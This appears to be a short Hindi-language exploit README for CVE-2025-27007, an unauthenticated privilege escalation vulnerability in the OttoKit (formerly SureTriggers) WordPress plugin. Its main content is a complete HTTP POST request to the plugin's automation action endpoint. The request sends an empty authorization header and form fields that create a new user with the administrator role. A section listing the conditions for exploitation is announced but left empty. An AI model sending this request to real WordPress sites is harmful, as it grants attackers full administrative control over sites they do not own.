
CVE-2025-27007 का शोषण, ओटोकिट (पूर्व में SureTriggers) वर्डप्रेस प्लगइन में एक गंभीर अप्रमाणित विशेषाधिकार वृद्धि भेद्यता
CVE-2025-27007 का शोषण, WordPress के लिए OttoKit प्लगइन (पहले SureTriggers के नाम से जाना जाता था) में अनधिकृत विशेषाधिकार वृद्धि की एक गंभीर भेद्यता है। यह रिपॉजिटरी बताती है कि कैसे एक हमलावर एक असुरक्षित WordPress साइट पर व्यवस्थापक खाता बना सकता है।
भेद्यता का शोषण निम्नलिखित परिस्थितियों में किया जा सकता है:
निम्नलिखित अनुरोध /wp-json/sure-triggers/v1/automation/action एंडपॉइंट को लक्षित करता है ताकि एक व्यवस्थापक खाता बनाया जा सके:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists